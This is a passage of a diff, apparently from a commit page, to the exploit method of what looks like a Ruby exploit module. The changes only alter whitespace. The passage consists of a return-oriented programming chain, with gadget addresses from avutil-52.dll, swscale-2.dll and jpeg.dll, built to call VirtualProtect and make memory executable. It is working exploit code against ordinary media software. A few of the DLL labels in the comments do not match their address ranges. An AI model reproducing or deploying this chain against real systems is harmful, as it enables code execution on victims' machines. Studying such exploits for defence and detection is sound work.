@@ -86,7 +86,7 @@ def exploit
86
86
0x66d9d9ba , # NEG EAX # RETN [avutil-52.dll]
87
87
0x6ab2241d , # XCHG EAX,EDX # ADD ESP,2C # POP EBP # POP EDI # POP ESI # POP EBX # RETN [swscale-2.dll]
88
88
junk ( 15 ) , # reserve more junk for add esp,2c
89
- 0x1004cc03 , # POP ECX # RETN [jpeg.dll]
89
+ 0x1004cc03 , # POP ECX # RETN [jpeg.dll]
90
90
0x6ab561b0 , # ptr to &VirtualProtect() [IAT swscale-2.dll]
91
91
0x66d9feee , # MOV EAX,DWORD PTR DS:[ECX] # RETN [avutil-52.dll]
92
92
0x6ab19780 , # XCHG EAX,ESI # RETN [swscale-2.dll]
@@ -100,7 +100,7 @@ def exploit
100
100
0x66d8ae48 , # XCHG ECX,EBX # RETN [avutil-52.dll]
101
101
0x1005f6e4 , # ADD EBX,EAX # OR EAX,3000000 # RETN [jpeg.dll]
102
102
0x6ab3d688 , # POP ECX # RETN [jpeg.dll]
103
- 0x6ab4ead0 , # Writable address [avutil-52.dll]
103
+ 0x6ab4ead0 , # Writable address [avutil-52.dll]
104
104
0x100444e3 , # POP EDI # RETN [swscale-2.dll]
105
105
nops ( true ) , # ROP NOP [swscale-2.dll]
106
106
0x100482ff , # POP EAX # POP EBP # RETN [jpeg.dll]
0 commit comments